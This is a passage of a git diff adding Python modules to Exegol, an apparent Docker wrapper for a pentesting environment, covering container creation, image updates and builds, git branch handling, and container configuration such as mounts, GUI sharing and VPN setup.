+            # IndexError is raised when no container exists (raised from TUI interactive selection) +            # Create container +            if must_exist: +                logger.warning(f"The container named '{container_tag}' has not been found") +                return [] if multiple else None +            return cls.__createContainer(container_tag) +        assert cls.__container is not None +        return cast(Union[Optional[ExegolContainer], List[ExegolContainer]], cls.__container) + +    @classmethod +    def __interactiveSelection(cls, +                               object_type: type, +                               multiple: bool = False, +                               must_exist: bool = False) -> \ +            Union[ExegolImage, ExegolContainer, Sequence[ExegolImage], Sequence[ExegolContainer]]: +        """Interactive object selection process, depending on object_type. +        object_type can be ExegolImage or ExegolContainer.""" +        object_list: Sequence[SelectableInterface] +        # Object listing depending on the type +        if object_type is ExegolContainer: +            # List all containers available +            object_list = DockerUtils.listContainers() +        elif object_type is ExegolImage: +            # List all images available +            object_list = DockerUtils.listInstalledImages() if must_exist else DockerUtils.listImages() +        else: +            logger.critical("Unknown object type during interactive selection. Exiting.") +            raise Exception +        # Interactive choice with TUI +        user_selection: Union[SelectableInterface, Sequence[SelectableInterface], str] +        if multiple: +            user_selection = ExegolTUI.multipleSelectFromTable(object_list, object_type=object_type) +        else: +            user_selection = ExegolTUI.selectFromTable(object_list, object_type=object_type, +                                                       allow_None=not must_exist) +        # Check if the user has chosen an existing object +        if type(user_selection) is str: +            # Otherwise, create a new object with the supplied name +            if object_type is ExegolContainer: +                user_selection = cls.__createContainer(user_selection) +            else: +                # Calling buildAndLoad directly, no need to ask confirmation, already done by TUI.
+ user_selection = UpdateManager.buildAndLoad(user_selection) + return cast(Union[ExegolImage, ExegolContainer, List[ExegolImage], List[ExegolContainer]], user_selection) + + @classmethod + def __prepareContainerConfig(cls): + """Create Exegol configuration with user input""" + # Create default exegol config + config = ContainerConfig() + # Container configuration from user CLI options + if ParametersManager().X11: + config.enableGUI() + if ParametersManager().share_timezone: + config.enableSharedTimezone() + config.setNetworkMode(ParametersManager().host_network) + if ParametersManager().shared_resources: + config.enableSharedResources() + if ParametersManager().exegol_resources: + config.enableExegolResources() + if ParametersManager().workspace_path: + if ParametersManager().mount_current_dir: + logger.warning( + f'Workspace conflict detected (-cwd cannot be use with -w). Using: {ParametersManager().workspace_path}') + config.setWorkspaceShare(ParametersManager().workspace_path) + elif ParametersManager().mount_current_dir: + config.enableCwdShare() + if ParametersManager().privileged: + config.setPrivileged() + if ParametersManager().volumes is not None: + for volume in ParametersManager().volumes: + config.addRawVolume(volume) + if ParametersManager().devices is not None: + for device in ParametersManager().devices: + config.addDevice(device) + if ParametersManager().vpn is not None: + config.enableVPN() + if ParametersManager().envs is not None: + for env in ParametersManager().envs: + config.addRawEnv(env) + return config + + @classmethod + def __createContainer(cls, name: Optional[str]) -> ExegolContainer: + """Create an ExegolContainer""" + logger.verbose("Configuring new exegol container") + # Create exegol config + image: Optional[ExegolImage] = cast(ExegolImage, cls.__loadOrInstallImage()) + config = cls.__prepareContainerConfig() + assert image is not None # load or install return an image + model = ExegolContainerTemplate(name, config, image) + + # 
Recap + ExegolTUI.printContainerRecap(model) + if cls.__interactive_mode: + if not model.image.isUpToDate() and \ + Confirm("Do you want to [green]update[/green] the selected image?", False): + image = UpdateManager.updateImage(model.image.getName()) + if image is not None: + model.image = image + ExegolTUI.printContainerRecap(model) + command_options = [] + while not Confirm("Is the container configuration [green]correct[/green]?", default=True): + command_options = model.config.interactiveConfig(model.name) + ExegolTUI.printContainerRecap(model) + logger.info(f"Command line of the configuration: " + f"[green]exegol start {model.name} {model.image.getName()} {' '.join(command_options)}[/green]") + logger.info("To use exegol [orange3]without interaction[/orange3], " + "read CLI options with [green]exegol start -h[/green]") + + container = DockerUtils.createContainer(model) + container.postStartSetup() + return container + + @classmethod + def __createTmpContainer(cls, image_name: Optional[str] = None) -> ExegolContainer: + """Create a temporary ExegolContainer with custom entrypoint""" + logger.verbose("Configuring new exegol container") + # Create exegol config + config = cls.__prepareContainerConfig() + # When container exec a command as a daemon, the execution must be set on the container's entrypoint + if ParametersManager().daemon: + # Using formatShellCommand to support zsh aliases + cmd = ExegolContainer.formatShellCommand(ParametersManager().exec) + config.setContainerCommand(cmd) + # Workspace must be disabled for temporary container because host directory is never deleted + config.disableDefaultWorkspace() + name = f"tmp-{binascii.b2a_hex(os.urandom(4)).decode('ascii')}" + image: ExegolImage = cast(ExegolImage, cls.__loadOrInstallImage(override_image=image_name)) + model = ExegolContainerTemplate(name, config, image) + + container = DockerUtils.createContainer(model, temporary=True) + container.postStartSetup() + return container + + @classmethod + def 
__checkUselessParameters(cls): + """Checks if the container creation parameters have not been filled in when the container already existed""" + # Get defaults parameters + creation_parameters = ContainerCreation([]).__dict__ + # Get parameters from user input + user_inputs = ParametersManager().parameters.__dict__ + detected = [] + for param in creation_parameters.keys(): + # Skip parameters useful in a start context + if param in ('containertag',): + continue + # For each parameter, check if it's not None and different from the default + if user_inputs.get(param) is not None and \ + user_inputs.get(param) != creation_parameters.get(param).kwargs.get('default'): + # If the supplied parameter is positional, getting his printed name + name = creation_parameters.get(param).kwargs.get('metavar') + if name is None: + # if not, using the args name + detected.append(' / '.join(creation_parameters.get(param).args)) + else: + detected.append(name) + if len(detected) > 0: + logger.warning(f"These parameters ({', '.join(detected)}) have been entered although the container already " + f"exists, they will not be taken into account.") diff --git a/exegol/manager/UpdateManager.py b/exegol/manager/UpdateManager.py new file mode 100644 index 00000000..cd1d0d68 --- /dev/null +++ b/exegol/manager/UpdateManager.py @@ -0,0 +1,237 @@ +from typing import Optional, Dict, cast, Tuple, Sequence + +from rich.prompt import Prompt + +from exegol.console.ExegolPrompt import Confirm +from exegol.console.TUI import ExegolTUI +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.exceptions.ExegolExceptions import ObjectNotFound, CancelOperation +from exegol.model.ExegolImage import ExegolImage +from exegol.model.ExegolModules import ExegolModules +from exegol.utils.ConstantConfig import ConstantConfig +from exegol.utils.DockerUtils import DockerUtils +from exegol.utils.ExeLog import logger, console, ExeLog +from exegol.utils.GitUtils import GitUtils + + +class 
UpdateManager: + """Procedure class for updating the exegol tool and docker images""" + + @classmethod + def updateImage(cls, tag: Optional[str] = None, install_mode: bool = False) -> Optional[ExegolImage]: + """User procedure to build/pull docker image""" + # List Images + image_args = ParametersManager().imagetag + # Select image + if image_args is not None and tag is None: + tag = image_args + if tag is None: + try: + # Interactive selection + selected_image = ExegolTUI.selectFromTable(DockerUtils.listImages(), + object_type=ExegolImage, + allow_None=install_mode) + except IndexError: + # No images are available + if install_mode: + # If no image are available in install mode, + # either the user does not have internet, + # or the image repository has been changed and no docker image is available + logger.critical("Exegol can't be installed offline") + return None + else: + try: + # Find image by name + selected_image = DockerUtils.getImage(tag) + except ObjectNotFound: + # If the image do not exist, ask to build it + return cls.__askToBuild(tag) + + if selected_image is not None and type(selected_image) is ExegolImage: + # Update existing ExegolImage + if DockerUtils.downloadImage(selected_image, install_mode): + sync_result = None + # Name comparison allow detecting images without version tag + if not selected_image.isVersionSpecific() and selected_image.getName() != selected_image.getLatestVersionName(): + with console.status(f"Synchronizing version tag information. Please wait.", spinner_style="blue"): + # Download associated version tag. 
+ sync_result = DockerUtils.downloadVersionTag(selected_image) + # Detect if an error have been triggered during the download + if type(sync_result) is str: + logger.error(f"Error while downloading version tag, {sync_result}") + sync_result = None + # if version tag have been successfully download, returning ExegolImage from docker response + if sync_result is not None and type(sync_result) is ExegolImage: + return sync_result + return DockerUtils.getInstalledImage(selected_image.getName()) + elif type(selected_image) is str: + # Build a new image using TUI selected name, confirmation has already been requested by TUI + return cls.buildAndLoad(selected_image) + else: + # Unknown use case + logger.critical(f"Unknown selected image type: {type(selected_image)}. Exiting.") + return cast(Optional[ExegolImage], selected_image) + + @classmethod + def __askToBuild(cls, tag: str) -> Optional[ExegolImage]: + """Build confirmation process and image building""" + # Need confirmation from the user before starting building. 
+ if ParametersManager().build_profile is not None or \ + Confirm("Do you want to build locally a custom image?", default=False): + return cls.buildAndLoad(tag) + return None + + @classmethod + def updateWrapper(cls) -> bool: + """Update wrapper source code from git""" + return cls.__updateGit(ExegolModules().getWrapperGit()) + + @classmethod + def updateImageSource(cls) -> bool: + """Update image source code from git submodule""" + return cls.__updateGit(ExegolModules().getSourceGit()) + + @classmethod + def updateResources(cls) -> bool: + """Update Exegol-resources from git (submodule)""" + try: + if not ExegolModules().isExegolResourcesReady() and not Confirm('Do you want to update exegol resources.', default=True): + return False + return cls.__updateGit(ExegolModules().getResourcesGit()) + except CancelOperation: + # Error during installation, skipping operation + return False + + @staticmethod + def __updateGit(gitUtils: GitUtils) -> bool: + """User procedure to update local git repository""" + if not gitUtils.isAvailable: + logger.empty_line() + return False + logger.info(f"Updating Exegol [green]{gitUtils.getName()}[/green] {gitUtils.getSubject()}") + # Check if pending change -> cancel + if not gitUtils.safeCheck(): + logger.error("Aborting git update.") + logger.empty_line() + return False + current_branch = gitUtils.getCurrentBranch() + if current_branch is None: + logger.warning("HEAD is detached. 
Please checkout to an existing branch.") + current_branch = "unknown" + if logger.isEnabledFor(ExeLog.VERBOSE) or current_branch not in ["master", "main"]: + available_branches = gitUtils.listBranch() + # Ask to checkout only if there is more than one branch available + if len(available_branches) > 1: + logger.info(f"Current git branch : {current_branch}") + # List & Select git branch + if current_branch == 'unknown' or current_branch not in available_branches: + if "main" in available_branches: + default_choice = "main" + elif "master" in available_branches: + default_choice = "master" + else: + default_choice = None + else: + default_choice = current_branch + selected_branch = cast(str, ExegolTUI.selectFromList(gitUtils.listBranch(), + subject="a git branch", + title="[not italic]:palm_tree: [/not italic][gold3]Branch[gold3]", + default=default_choice)) + elif len(available_branches) == 0: + logger.warning("No branch were detected!") + selected_branch = None + else: + # Automatically select the only branch in case of HEAD detachment + selected_branch = available_branches[0] + # Checkout new branch + if selected_branch is not None and selected_branch != current_branch: + gitUtils.checkout(selected_branch) + # git pull + gitUtils.update() + logger.empty_line() + return True + + @classmethod + def __buildSource(cls, build_name: Optional[str] = None) -> str: + """build user process : + Ask user is he want to update the git source (to get new& updated build profiles), + User choice a build name (if not supplied) + User select a build profile + Start docker image building + Return the name of the built image""" + # Ask to update git + try: + if ExegolModules().getSourceGit().isAvailable and not ExegolModules().getSourceGit().isUpToDate() and \ + Confirm("Do you want to update image sources (in order to update local build profiles)?", default=True): + cls.updateImageSource() + except AssertionError: + # Catch None git object assertions + logger.warning("Git update is 
[orange3]not available[/orange3]. Skipping.") + # Choose tag name + blacklisted_build_name = ["stable", "full"] + while build_name is None or build_name in blacklisted_build_name: + if build_name is not None: + logger.error("This name is reserved and cannot be used for local build. Please choose another one.") + build_name = Prompt.ask("[bold blue][?][/bold blue] Choice a name for your build", + default="local") + # Choose dockerfile + profiles = cls.listBuildProfiles() + build_profile: Optional[str] = ParametersManager().build_profile + build_dockerfile: Optional[str] = None + if build_profile is not None: + build_dockerfile = profiles.get(build_profile) + if build_dockerfile is None: + logger.error(f"Build profile {build_profile} not found.") + if build_dockerfile is None: + build_profile, build_dockerfile = cast(Tuple[str, str], ExegolTUI.selectFromList(profiles, + subject="a build profile", + title="[not italic]:dog: [/not italic][gold3]Profile[/gold3]")) + logger.debug(f"Using {build_profile} build profile ({build_dockerfile})") + # Docker Build + DockerUtils.buildImage(build_name, build_profile, build_dockerfile) + return build_name + + @classmethod + def buildAndLoad(cls, tag: str): + """Build an image and load it""" + build_name = cls.__buildSource(tag) + return DockerUtils.getInstalledImage(build_name) + + @classmethod + def listBuildProfiles(cls) -> Dict: + """List every build profiles available locally + Return a dict of options {"key = profile name": "value = dockerfile full name"}""" + # Default stable profile + profiles = {"full": "Dockerfile"} + # List file *.dockerfile is the build context directory + logger.debug(f"Loading build profile from {ConstantConfig.build_context_path}") + docker_files = list(ConstantConfig.build_context_path_obj.glob("*.dockerfile")) + for file in docker_files: + # Convert every file to the dict format + filename = file.name + profile_name = filename.replace(".dockerfile", "") + profiles[profile_name] = filename + 
logger.debug(f"List docker build profiles : {profiles}") + return profiles + + @classmethod + def listGitStatus(cls) -> Sequence[Dict[str, str]]: + result = [] + gits = [ExegolModules().getWrapperGit(fast_load=True), + ExegolModules().getSourceGit(fast_load=True), + ExegolModules().getResourcesGit(fast_load=True, skip_install=True)] + + with console.status(f"Loading module information", spinner_style="blue") as s: + for git in gits: + s.update(status=f"Loading module [green]{git.getName()}[/green] information") + status = git.getTextStatus() + branch = git.getCurrentBranch() + if branch is None: + if "not supported" in status: + branch = "[bright_black]N/A[/bright_black]" + else: + branch = "[bright_black][g]? :person_shrugging:[/g][/bright_black]" + result.append({"name": git.getName().capitalize(), + "status": status, + "current branch": branch}) + return result diff --git a/exegol/manager/__init__.py b/exegol/manager/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/model/ContainerConfig.py b/exegol/model/ContainerConfig.py new file mode 100644 index 00000000..e8dc62ac --- /dev/null +++ b/exegol/model/ContainerConfig.py @@ -0,0 +1,797 @@ +import os +import re +from pathlib import Path, PurePath +from typing import Optional, List, Dict, Union, Tuple, cast + +from docker.models.containers import Container +from docker.types import Mount +from rich.prompt import Prompt + +from exegol.console.ConsoleFormat import boolFormatter, getColor +from exegol.console.ExegolPrompt import Confirm +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.exceptions.ExegolExceptions import ProtocolNotSupported, CancelOperation +from exegol.model.ExegolModules import ExegolModules +from exegol.utils import FsUtils +from exegol.utils.EnvInfo import EnvInfo +from exegol.utils.ExeLog import logger, ExeLog +from exegol.utils.GuiUtils import GuiUtils +from exegol.utils.UserConfig import UserConfig + + +class ContainerConfig: + 
"""Configuration class of an exegol container""" + + # Default hardcoded value + __default_entrypoint = "bash" + __default_shm_size = "64M" + + def __init__(self, container: Optional[Container] = None): + """Container config default value""" + self.__enable_gui: bool = False + self.__share_timezone: bool = False + self.__shared_resources: bool = False + self.__exegol_resources: bool = False + self.__network_host: bool = True + self.__privileged: bool = False + self.__mounts: List[Mount] = [] + self.__devices: List[str] = [] + self.__capabilities: List[str] = [] + self.__sysctls: Dict[str, str] = {} + self.__envs: Dict[str, str] = {} + self.__ports: Dict[str, Optional[Union[int, Tuple[str, int], List[int]]]] = {} + self.interactive: bool = True + self.tty: bool = True + self.shm_size: str = self.__default_shm_size + self.__workspace_custom_path: Optional[str] = None + self.__workspace_dedicated_path: Optional[str] = None + self.__disable_workspace: bool = False + self.__container_command: str = self.__default_entrypoint + self.__vpn_path: Optional[Union[Path, PurePath]] = None + if container is not None: + self.__parseContainerConfig(container) + + def __parseContainerConfig(self, container: Container): + """Parse Docker object to setup self configuration""" + # Container Config section + container_config = container.attrs.get("Config", {}) + self.tty = container_config.get("Tty", True) + self.__parseEnvs(container_config.get("Env", [])) + self.interactive = container_config.get("OpenStdin", True) + self.__enable_gui = False + for env in self.__envs: + if "DISPLAY" in env: + self.__enable_gui = True + break + + # Host Config section + host_config = container.attrs.get("HostConfig", {}) + self.__privileged = host_config.get("Privileged", False) + caps = host_config.get("CapAdd", []) + if caps is not None: + self.__capabilities = caps + logger.debug(f"Capabilities : {self.__capabilities}") + self.__sysctls = host_config.get("Sysctls", {}) + devices = 
host_config.get("Devices", []) + if devices is not None: + for device in devices: + self.__devices.append( + f"{device.get('PathOnHost', '?')}:{device.get('PathInContainer', '?')}:{device.get('CgroupPermissions', '?')}") + logger.debug(f"Load devices : {self.__devices}") + + # Volumes section + self.__share_timezone = False + self.__shared_resources = False + self.__parseMounts(container.attrs.get("Mounts", []), container.name.replace('exegol-', '')) + + # Network section + network_settings = container.attrs.get("NetworkSettings", {}) + self.__network_host = "host" in network_settings["Networks"] + self.__ports = network_settings.get("Ports", {}) + + def __parseEnvs(self, envs: List[str]): + """Parse envs object syntax""" + for env in envs: + logger.debug(f"Parsing envs : {env}") + # Removing " and ' at the beginning and the end of the string before splitting key / value + self.addRawEnv(env.strip("'").strip('"')) + + def __parseMounts(self, mounts: Optional[List[Dict]], name: str): + """Parse Mounts object""" + if mounts is None: + mounts = [] + self.__disable_workspace = True + for share in mounts: + logger.debug(f"Parsing mount : {share}") + src_path: Optional[PurePath] = None + obj_path: PurePath + if share.get('Type', 'volume') == "volume": + source = f"Docker {share.get('Driver', '')} volume '{share.get('Name', 'unknown')}'" + else: + source = share.get("Source", '') + src_path = FsUtils.parseDockerVolumePath(source) + + # When debug is disabled, exegol print resolved windows path of mounts + if logger.getEffectiveLevel() > ExeLog.ADVANCED: + source = str(src_path) + + self.__mounts.append(Mount(source=source, + target=share.get('Destination'), + type=share.get('Type', 'volume'), + read_only=(not share.get("RW", True)), + propagation=share.get('Propagation', ''))) + if "/etc/timezone" in share.get('Destination', ''): + self.__share_timezone = True + elif "/opt/resources" in share.get('Destination', ''): + self.__exegol_resources = True + elif "/my-resources" 
in share.get('Destination', ''): + self.__shared_resources = True + elif "/workspace" in share.get('Destination', ''): + # Workspace are always bind mount + assert src_path is not None + obj_path = cast(PurePath, src_path) + logger.debug(f"Loading workspace volume source : {obj_path}") + self.__disable_workspace = False + if obj_path is not None and obj_path.name == name and \ + (obj_path.parent.name == "shared-data-volumes" or obj_path.parent == UserConfig().private_volume_path): # Check legacy path and new custom path + logger.debug("Private workspace detected") + self.__workspace_dedicated_path = str(obj_path) + else: + logger.debug("Custom workspace detected") + self.__workspace_custom_path = str(obj_path) + elif "/vpn" in share.get('Destination', ''): + # VPN are always bind mount + assert src_path is not None + obj_path = cast(PurePath, src_path) + self.__vpn_path = obj_path + logger.debug(f"Loading VPN config: {self.__vpn_path.name}") + + def interactiveConfig(self, container_name: str) -> List[str]: + """Interactive procedure allowing the user to configure its new container""" + logger.info("Starting interactive configuration") + + command_options = [] + + # Workspace config + if Confirm( + "Do you want to [green]share[/green] your [blue]current host working directory[/blue] in the new container's worskpace?", + default=False): + self.enableCwdShare() + command_options.append("-cwd") + elif Confirm( + f"Do you want to [green]share[/green] [blue]a host directory[/blue] in the new container's workspace [blue]different than the default one[/blue] ([magenta]{UserConfig().private_volume_path / container_name}[/magenta])?", + default=False): + while True: + workspace_path = Prompt.ask("Enter the path of your workspace") + if Path(workspace_path).expanduser().is_dir(): + break + else: + logger.error("The provided path is not a folder or does not exist.") + self.setWorkspaceShare(workspace_path) + command_options.append(f"-w {workspace_path}") + + # GUI Config + if 
self.__enable_gui: + if Confirm("Do you want to [orange3]disable[/orange3] [blue]GUI[/blue]?", False): + self.__disableGUI() + elif Confirm("Do you want to [green]enable[/green] [blue]GUI[/blue]?", False): + self.enableGUI() + # Command builder info + if not self.__enable_gui: + command_options.append("--disable-X11") + + # Timezone config + if self.__share_timezone: + if Confirm("Do you want to [orange3]remove[/orange3] your [blue]shared timezone[/blue] config?", False): + self.__disableSharedTimezone() + elif Confirm("Do you want to [green]share[/green] your [blue]host's timezone[/blue]?", False): + self.enableSharedTimezone() + # Command builder info + if not self.__share_timezone: + command_options.append("--disable-shared-timezones") + + # Shared resources config + if self.__shared_resources: + if Confirm("Do you want to [orange3]disable[/orange3] the [blue]shared resources[/blue]?", False): + self.__disableSharedResources() + elif Confirm("Do you want to [green]activate[/green] the [blue]shared resources[/blue]?", False): + self.enableSharedResources() + # Command builder info + if not self.__shared_resources: + command_options.append("--disable-shared-resources") + + # Exegol resources config + if self.__exegol_resources: + if Confirm("Do you want to [orange3]disable[/orange3] the [blue]exegol resources[/blue]?", False): + self.disableExegolResources() + elif Confirm("Do you want to [green]activate[/green] the [blue]exegol resources[/blue]?", False): + self.enableExegolResources() + # Command builder info + if not self.__exegol_resources: + command_options.append("--disable-exegol-resources") + + # Network config + if self.__network_host: + if Confirm("Do you want to use a [blue]dedicated private network[/blue]?", False): + self.setNetworkMode(False) + elif Confirm("Do you want to share the [green]host's[/green] [blue]networks[/blue]?", False): + self.setNetworkMode(True) + # Command builder info + if not self.__network_host: + 
command_options.append("--disable-shared-network") + + # VPN config + if self.__vpn_path is None and Confirm( + "Do you want to [green]enable[/green] a [blue]VPN[/blue] for this container", False): + while True: + vpn_path = Prompt.ask('Enter the path to the OpenVPN config file') + if Path(vpn_path).expanduser().is_file(): + self.enableVPN(vpn_path) + break + else: + logger.error("No config files were found.") + elif self.__vpn_path and Confirm( + "Do you want to [orange3]remove[/orange3] your [blue]VPN configuration[/blue] in this container", False): + self.__disableVPN() + if self.__vpn_path: + command_options.append(f"--vpn {self.__vpn_path}") + + return command_options + + def enableGUI(self): + """Procedure to enable GUI feature""" + if not GuiUtils.isGuiAvailable(): + logger.error("GUI feature is [red]not available[/red] on your environment. [orange3]Skipping[/orange3].") + return + if not self.__enable_gui: + self.__enable_gui = True + logger.verbose("Config: Enabling display sharing") + self.addVolume(GuiUtils.getX11SocketPath(), "/tmp/.X11-unix") + self.addEnv("DISPLAY", GuiUtils.getDisplayEnv()) + self.addEnv("QT_X11_NO_MITSHM", "1") + # TODO support pulseaudio + + def __disableGUI(self): + """Procedure to enable GUI feature (Only for interactive config)""" + if self.__enable_gui: + self.__enable_gui = False + logger.verbose("Config: Disabling display sharing") + self.removeVolume(container_path="/tmp/.X11-unix") + self.removeEnv("DISPLAY") + self.removeEnv("QT_X11_NO_MITSHM") + + def enableSharedTimezone(self): + """Procedure to enable shared timezone feature""" + if EnvInfo.is_windows_shell: + logger.warning("Timezone sharing is not supported from a Windows shell. 
Skipping.") + return + if not self.__share_timezone: + self.__share_timezone = True + logger.verbose("Config: Enabling host timezones") + self.addVolume("/etc/timezone", "/etc/timezone", read_only=True) + self.addVolume("/etc/localtime", "/etc/localtime", read_only=True) + + def __disableSharedTimezone(self): + """Procedure to disable shared timezone feature (Only for interactive config)""" + if self.__share_timezone: + self.__share_timezone = False + logger.verbose("Config: Disabling host timezones") + self.removeVolume("/etc/timezone") + self.removeVolume("/etc/localtime") + + def setPrivileged(self, status: bool = True): + """Set container as privileged""" + logger.verbose(f"Config: Setting container privileged as {status}") + if status: + logger.warning("Setting container as privileged (this exposes the host to security risks)") + self.__privileged = status + + def enableSharedResources(self): + """Procedure to enable shared volume feature""" + if not self.__shared_resources: + logger.verbose("Config: Enabling shared resources volume") + self.__shared_resources = True + # Adding volume config + self.addVolume(UserConfig().shared_resources_path, '/my-resources') + + def __disableSharedResources(self): + """Procedure to disable shared volume feature (Only for interactive config)""" + if self.__shared_resources: + logger.verbose("Config: Disabling shared resources volume") + self.__shared_resources = False + self.removeVolume(container_path='/my-resources') + + def enableExegolResources(self) -> bool: + """Procedure to enable exegol resources volume feature""" + if not self.__exegol_resources: + # Check if resources are installed / up-to-date + try: + if not ExegolModules().isExegolResourcesReady(): + raise CancelOperation + except CancelOperation: + # Error during installation, skipping operation + logger.warning("Exegol resources have not been downloaded, the feature cannot be enabled") + return False + logger.verbose("Config: Enabling exegol resources volume") 
+ self.__exegol_resources = True + # Adding volume config + self.addVolume(str(UserConfig().exegol_resources_path), '/opt/resources') + return True + + def disableExegolResources(self): + """Procedure to disable exegol resources volume feature (Only for interactive config)""" + if self.__exegol_resources: + logger.verbose("Config: Disabling exegol resources volume") + self.__exegol_resources = False + self.removeVolume(container_path='/opt/resources') + + def enableCwdShare(self): + """Procedure to share Current Working Directory with the /workspace of the container""" + self.__workspace_custom_path = os.getcwd() + logger.verbose(f"Config: Sharing current workspace directory {self.__workspace_custom_path}") + + def setWorkspaceShare(self, host_directory): + """Procedure to share a specific directory with the /workspace of the container""" + path = Path(host_directory).expanduser().absolute() + if not path.is_dir(): + logger.critical("The specified workspace is not a directory") + logger.verbose(f"Config: Sharing workspace directory {path}") + self.__workspace_custom_path = str(path) + + def enableVPN(self, config_path: Optional[str] = None): + """Configure a VPN profile for container startup""" + # Check host mode : custom (allows you to isolate the VPN connection from the host's network) + if self.__network_host: + logger.warning("Using the host network mode with a VPN profile is not recommended.") + if not Confirm(f"Are you sure you want to configure a VPN container based on the host's network?", + default=False): + logger.info("Changing network mode to custom") + self.setNetworkMode(False) + # Add NET_ADMIN capabilities, this privilege is necessary to mount network tunnels + self.__addCapability("NET_ADMIN") + if not self.__network_host: + # Add sysctl ipv6 config, some VPN connection need IPv6 to be enabled + self.__addSysctl("net.ipv6.conf.all.disable_ipv6", "0") + # Add tun device, this device is needed to create VPN tunnels + self.addDevice("/dev/net/tun", 
mknod=True) + # Sharing VPN configuration with the container + ovpn_parameters = self.__prepareVpnVolumes(config_path) + # Execution of the VPN daemon at container startup + if ovpn_parameters is not None: + self.setContainerCommand( + f"bash -c 'cd /vpn/config; openvpn {ovpn_parameters} | tee /var/log/vpn.log; bash'") # TODO add log rotation on image config + + def __prepareVpnVolumes(self, config_path: Optional[str]) -> Optional[str]: + """Volumes must be prepared to share OpenVPN configuration files with the container. + Depending on the user's settings, different configurations can be applied. + With or without username / password authentication via auth-user-pass. + OVPN config file directly supplied or a config directory, + the directory feature is useful when the configuration depends on multiple files like certificate, keys etc.""" + ovpn_parameters = [] + + # VPN Auth creds file + input_vpn_auth = ParametersManager().vpn_auth + vpn_auth = None + if input_vpn_auth is not None: + vpn_auth = Path(input_vpn_auth).expanduser() + + if vpn_auth is not None: + if vpn_auth.is_file(): + logger.info(f"Adding VPN credentials from: {str(vpn_auth.absolute())}") + self.addVolume(str(vpn_auth.absolute()), "/vpn/auth/creds.txt", read_only=True) + ovpn_parameters.append("--auth-user-pass /vpn/auth/creds.txt") + else: + # Supply a directory instead of a file for VPN authentication is not supported. + logger.critical( + f"The path provided to the VPN connection credentials ({str(vpn_auth)}) does not lead to a file. 
Aborting operation.") + + # VPN config path + vpn_path = Path(config_path if config_path else ParametersManager().vpn).expanduser() + + logger.debug(f"Adding VPN from: {str(vpn_path.absolute())}") + self.__vpn_path = vpn_path + if vpn_path.is_file(): + # Configure VPN with single file + self.addVolume(str(vpn_path.absolute()), "/vpn/config/client.ovpn", read_only=True) + ovpn_parameters.append("--config /vpn/config/client.ovpn") + else: + # Configure VPN with directory + logger.verbose( + "Folder detected for VPN configuration. only the first *.ovpn file will be automatically launched when the container starts.") + self.addVolume(str(vpn_path.absolute()), "/vpn/config", read_only=True) + vpn_filename = None + # Try to find the config file in order to configure the autostart command of the container + for file in vpn_path.glob('*.ovpn'): + logger.info(f"Using VPN config: {file}") + # Get filename only to match the future container path + vpn_filename = file.name + ovpn_parameters.append(f"--config /vpn/config/{vpn_filename}") + # If there is multiple match, only the first one is selected + break + if vpn_filename is None: + logger.error("No *.ovpn files were detected. 
The VPN autostart will not work.") + return None + + return ' '.join(ovpn_parameters) + + def __disableVPN(self) -> bool: + """Remove a VPN profile for container startup (Only for interactive config)""" + if self.__vpn_path: + logger.verbose('Removing VPN configuration') + self.__vpn_path = None + self.__removeCapability("NET_ADMIN") + self.__removeSysctl("net.ipv6.conf.all.disable_ipv6") + self.removeDevice("/dev/net/tun") + # Try to remove each possible volume + self.removeVolume(container_path="/vpn/auth/creds.txt") + self.removeVolume(container_path="/vpn/config/client.ovpn") + self.removeVolume(container_path="/vpn/config") + self.__restoreEntrypoint() + return True + return False + + def disableDefaultWorkspace(self): + """Allows you to disable the default workspace volume""" + # If a custom workspace is not define, disable workspace + if self.__workspace_custom_path is None: + self.__disable_workspace = True + + def prepareShare(self, share_name: str): + """Add workspace share before container creation""" + for mount in self.__mounts: + if mount.get('Target') == '/workspace': + # Volume is already prepared + return + if self.__workspace_custom_path is not None: + self.addVolume(self.__workspace_custom_path, '/workspace') + elif self.__disable_workspace: + # Skip default volume workspace if disabled + return + else: + # Add shared-data-volumes private workspace bind volume + volume_path = str(UserConfig().private_volume_path.joinpath(share_name)) + self.addVolume(volume_path, '/workspace') + + def setNetworkMode(self, host_mode: bool): + """Set container's network mode, true for host, false for bridge""" + if host_mode is None: + host_mode = True + self.__network_host = host_mode + + def setContainerCommand(self, cmd: str): + """Set the entrypoint command of the container. This command is executed at each startup. 
+ This parameter is applied to the container at creation.""" + self.__container_command = cmd + + def __restoreEntrypoint(self): + """Restore container's entrypoint to its default configuration""" + self.__container_command = self.__default_entrypoint + + def __addCapability(self, cap_string: str): + """Add a linux capability to the container""" + if cap_string in self.__capabilities: + logger.warning("Capability already setup. Skipping.") + return + self.__capabilities.append(cap_string) + + def __removeCapability(self, cap_string: str): + """Remove a linux capability from the container's config""" + try: + self.__capabilities.remove(cap_string) + return True + except ValueError: + # When the capability is not present + return False + + def __addSysctl(self, sysctl_key: str, config: str): + """Add a linux sysctl to the container""" + if sysctl_key in self.__sysctls.keys(): + logger.warning(f"Sysctl {sysctl_key} already setup to '{self.__sysctls[sysctl_key]}'. Skipping.") + return + self.__sysctls[sysctl_key] = config + + def __removeSysctl(self, sysctl_key: str): + """Remove a linux capability from the container's config""" + try: + self.__sysctls.pop(sysctl_key) + return True + except KeyError: + # When the sysctl is not present + return False + + def getNetworkMode(self) -> str: + """Network mode, text getter""" + return "host" if self.__network_host else "bridge" + + def getPrivileged(self) -> bool: + """Privileged getter""" + return self.__privileged + + def getCapabilities(self) -> List[str]: + """Capabilities getter""" + return self.__capabilities + + def getSysctls(self) -> Dict[str, str]: + """Sysctl custom rules getter""" + return self.__sysctls + + def getWorkingDir(self) -> str: + """Get default container's default working directory path""" + return "/" if self.__disable_workspace else "/workspace" + + def getContainerCommand(self) -> str: + """Get container entrypoint path""" + return self.__container_command + + def getHostWorkspacePath(self) -> str: 
